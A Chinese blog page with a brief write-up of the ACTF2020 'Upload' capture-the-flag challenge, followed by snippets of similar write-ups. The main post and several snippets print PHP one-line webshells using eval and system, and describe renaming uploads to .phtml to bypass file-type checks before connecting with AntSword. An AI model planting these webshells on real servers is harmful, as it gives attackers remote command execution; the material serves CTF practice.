日常练习之web([ACTF2020 新生赛]Upload)

最新推荐文章于 2022-02-18 12:11:19 发布
最新推荐文章于 2022-02-18 12:11:19 发布
阅读量280 收藏
点赞数
分类专栏: web 文章标签: upload
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/doraemon12345/article/details/110902232
版权

打开题目是一个灯泡,放上去会出现上传文件,但是只能上传jpg等图片类型的文件
在这里插入图片描述

很明显上传一个图片马

<script language='php'>@eval($_POST['pass']);</script>

放到txt里后缀名改成jpg格式,burp抓一下包,把jpg改成phtml绕过php检测
在这里插入图片描述

这里可以看到上传成功
在这里插入图片描述

拿出蚁剑或者菜刀连接你上传的木马在根目录下找到flag
在这里插入图片描述

flag{1db8d2ff-bc9d-4d06-a4ef-94757f236712}

south_1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ACTF2020 新生] web题-Upload
BROTHERYY的博客
07-09 487
复现环境:buuoj.cn 开题漆黑一片,注意观察中间,有个灯泡,鼠标移动上去以后会有上传的提示 查看下页面代码,发现有前端js验证 删除以后,发现很多都无法上传,最后phtml能够上传成功,这里可以不用GIF文件头 访问地址,蚁剑连接 也可以直接在phtml里面添加 <script language='php'>system('cat /flag');</script> 直接在访问上传的文件名的时候就读出flag. ...
BUUCTF WEB [ACTF2020 新生]Upload
Y1da的博客
04-16 280
BUUCTF WEB [ACTF2020 新生]Upload 生成一句话木马shell.png,内容为 <?php @eval($_POST['shell']);?> 上传后抓包,将文件名改为shell.phtml POST / HTTP/1.1 Host: d75f0dc8-3e8d-4e83-8af8-8972c71f8057.node4.buuoj.cn:81 Content-Length: 315 Cache-Control: max-age=0 Upgrade-Insec
[ACTF2020 新生]Upload
qq_42404383的博客
10-22 3722
[ACTF2020 新生]Upload 此题颇为简单,步骤颇为简略 题目: 分析: 前端:JS检验文件后缀–白名单机制: 先不急着写码,顺势而为,顺藤摸瓜搞清后台: ==》 老套路,前端上传test.gif ==》burp抓包 ==》 success,查看返回值 后端:上传后以HTML页面展示,暂时不知道有无检测 解题: 构造payload ==》好家伙,一把过 ==》初步判断后端对文件没有校验 又是老套路,传码,拿webshell ==》获取flag flag{9b269117-5b08-4
[ACTF2020 新生]Upload(文件上传)
weixin_44110537的博客
09-18 642
先尝试直接上传一句话木马,发现果然不行. 一开始觉得可能只是后端进行检测,但是发现流量还没有发出去就提示上传的文件错误,说明在前端就进行了检测. 把检测的checkFile()函数删掉. 然后上传一个phtml后缀的一句话木马.通过蚁剑链接即可. ...
buuctf [ACTF2020 新生]Upload 1
Naptmn的博客
02-24 1176
直接上传一个php的一句话发现无法上传 f12找到前端验证 这里有两个方法 1、直接删除这个元素 2、先上传jpg格式的一句话,bp抓包改为php 发现上传后后端仍然有检查 于是我们上传phtml格式的一句话木马(这里同样需要绕开前端验证) phtml可以理解为是另外一个php的文件后缀名 上传成功后蚁剑连接即可 ...
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
学习matlab的基本使用例子,有矩阵运算,绘制曲线图等
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
Jeopardy-Writeups:SniperOJ的CTF挑战比
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
NTFS文件系统分析
09-19
NTFS文件系统分析,比较详细的介绍,各个元文件的定义,偏移
光立方888 573 2803程序
06-14
光立方888 573 2803程序,有详细的原理图
ctf没有cat等程序等情况下读取flag
fjh1997的博客
07-25 786
tcsh 读10行 echo '@ num = 10\nwhile ( $num > 1 )\n set word = "$<"\n echo "$word"\n @ num -= 1\n # rest of code...\nend\n' > /b.sh && source /b.sh < /etc/ctf/flag.txt bash echo $(</etc/ctf/flag.txt)
CTF-目录遍历
su__xiaoyan的博客
12-28 3263
目录遍历 目录遍历(又称为路径遍历攻击、目录爬升或者回溯),旨在访问存储在web根目录文件夹之外的文件和目录,通过操纵带有“点-点-斜线”序列及变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置文件和系统关键文件。但是系统访问控制限制了对于某些文件的权限。 利用目录遍历漏洞getshell的思路 上传webshell到服务器上面,通过对应的目录遍历漏洞访问webshell,执行webshell,在攻击者的机器上面获取并反弹shell。 实
BUUCTFweb题刷题记录(2020.09.14-2020.09.19)
星|Donstpast
10-11 893
1.WarmUp 获得靶机后,进入网址,发现如上图。一如既往,查看源码。发现一个source.php,必然进去一探究竟出现源码,那么就要开始进行代码审计了呀。 先随便都看看嘛,所以咱先去hint.php去看看。 虽然没有直接获得flag,但是知道了flag在哪个目录中。再返回查看源码,其实此时可以猜到这道题考的就是一个文件包含了 首先看到这个if的,这三个限制分别是,file变量不能为空,传入的值要为字符串类型,传入的值要进入checkFile函数进行检查。所以,我们去审计checkFile函数 很明显
CTF实验:web安全命令执行
floyd_art的博客
04-12 1378
命令执行漏洞介绍 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常命令中,造成命令执行攻击。   调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,又没有过滤用户的输入的情况下,就会造成命令执行漏洞。 信息探测 ...
CTF之web学习记录 -- 文件上传
lifanxin的博客
06-21 1328
文件上传概述一句话木马常见攻击手段JS检测绕过攻击总结 概述   所谓文件上传漏洞,就是web服务器对上传的文件没有做好检测和过滤,从而使得恶意用户可以上传脚本程序到服务器,进而获得服务器权限。这个恶意脚本文件,又被称为WebShell,因此也可以将WebShell脚本作为一种网页后门,一般通过上传的脚本文件,我们可以查看服务器的目录结构和文件,亦或者执行系统命令等。 一句话木马   这里先介绍web服务器没有对上传的文件进行任何检测的情况下,我们应该如何攻击。   利用一句话木马,即上传一句话木马脚本文件
CTF-web 简介
iamsongyu的博客
10-08 5452
web部分是CTF的重要组成部分之一,素有WEB大魔王之称,题目种类繁多,关键是如何发现漏洞的类型和怎样构造特殊的负载绕过过滤。 CTF分为三种模式 解题模式 攻防模式 混合模式 在线工具 https://www.ctftools.com/down/ http://tool.bugku.com/jiemi/ 在线代码执行(各种网页语言 C C++) https://tool.lu/coderunn...
CTFHUB之WEB—信息泄露(目录遍历和PHPINFO)
m0_56988395的博客
02-18 2042
一,目录遍历 考点 目录遍历漏洞(由于配置错误导致网站的目录可被遍历,一般该类漏洞可以为后续利用提供一些信息上的帮助) 存在问题 (1)操作系统没有限制对文件的访问权限。导致任何人都可访问文件目录,并且利用 …/…/ 可以实现文件回溯,访问父文件 (2)www目录下的文件结构被暴露 利用Google hacking语法 intitle:index of intext:Parent Directory 会很容易就被找到该url链接 后面的操作直接一个个点击查找就行 ...
CTF——web个人总结
热门推荐
recover517的博客
05-28 1万+
包含个人总结的解题思路、注入思路、文件包含思路、源码审计思路等
[actf2020 新生]include
最新发布
03-16
好的,我理解您的请求是让我用中文回答您的问题,那么以下是关于 "actf2020 新生" 和 "include" 的回答: "actf2020 新生" 是指 2020 年举行的一项针对新生的网络安全竞。该比旨在通过一系列的挑战来测试参者的网络安全技能,包括密码学、漏洞利用、逆向工程等等。 而 "include" 是一个在编程中经常使用的指令,它用于将一个文件的内容插入到另一个文件中。在 C 语言中,"include" 常用于引入头文件,以便在当前文件中使用另一个文件中定义的函数、变量等。 希望我的回答能够解决您的疑惑,如果您有任何其他问题,请随时问我。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值